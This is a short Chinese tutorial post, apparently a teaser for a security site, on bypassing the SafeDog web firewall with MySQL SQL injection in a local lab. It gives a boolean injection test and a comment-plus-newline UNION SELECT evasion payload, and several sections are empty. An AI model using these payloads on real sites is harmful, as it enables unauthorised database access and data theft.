登陆 BUGFOR.COM 查看更多骚操作。注册即可抽奖黑客硬件
0X00 前言
版本: 4.0.26550 直接官方下载 最新版本
当前日期: 5-12日
本机系统: Windows
环境: PHPStudy 、套件 Apache + MySQL5.7.26
靶场下载链接:
https://pan.baidu.com/s/1QdqaDhZvio2KCQ3Uz3IVeA
提取码:rdhn
本文由“壹伴编辑器”提供技术支持
bypass 差不多就是根据各层特性来绕过安全狗的正则匹配
0X01 检测注入
id=2.0and 1=1
Payload为:
1'%26 1='1 为真 返回正确页面1'%26 1='2 为假 返回错误页面
0x02 猜字段数
0X03 联合查询
利用-- -a + 换行绕过
Payload:
-- -a%0aselect 1,2,3,11,5 from -- -a%0atest limit 1,1-- -a
(如果需要的话 请务必将列名改成mysql默认的 然后 后面的表名改成默认的)
该文章已经发布到 BUGFOR.COM
0X04 该文章已经发布到 BUGFOR.COM